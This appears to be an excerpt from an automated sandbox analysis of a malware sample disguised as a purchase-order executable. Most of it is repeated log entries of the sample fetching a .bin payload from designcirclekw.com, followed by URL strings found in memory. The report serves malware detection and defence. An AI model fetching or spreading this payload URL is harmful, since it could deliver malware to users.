      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: designcirclekw.com
      Source: PO-10212024168877 PNG2023-W101.exe, PO-10212024168877 PNG2023-W101.exe, 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000000.00000000.1445303761.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: PO-10212024168877 PNG2023-W101.exe, 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000000.00000000.1445303761.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000001.2607777042.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000001.2607777042.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000001.2607777042.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181377278.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3070130873.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269271168.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3028767017.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2970031415.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142595518.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2890472384.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3372975726.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353408541.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288676137.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3309422923.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201010339.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220354716.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2871405171.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181585136.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2852037864.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220645532.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3394670154.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3070453625.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3162090904.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269271168.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353408541.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288676137.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3309422923.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353581442.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328739652.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288465328.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328883453.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/$
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3249913342.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3249753104.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2950356283.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2950463769.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269271168.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/4
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/F
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3161939016.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3008954123.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328808939.00000000075B8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2989432317.00000000075DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.bin
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2832627511.00000000075DA000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2832535674.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2813443365.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2890472384.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2871405171.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2852037864.00000000075D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.bin)
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3372975726.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3394670154.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328739652.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328883453.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.bin5
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2871405171.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2852037864.00000000075D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.binQ
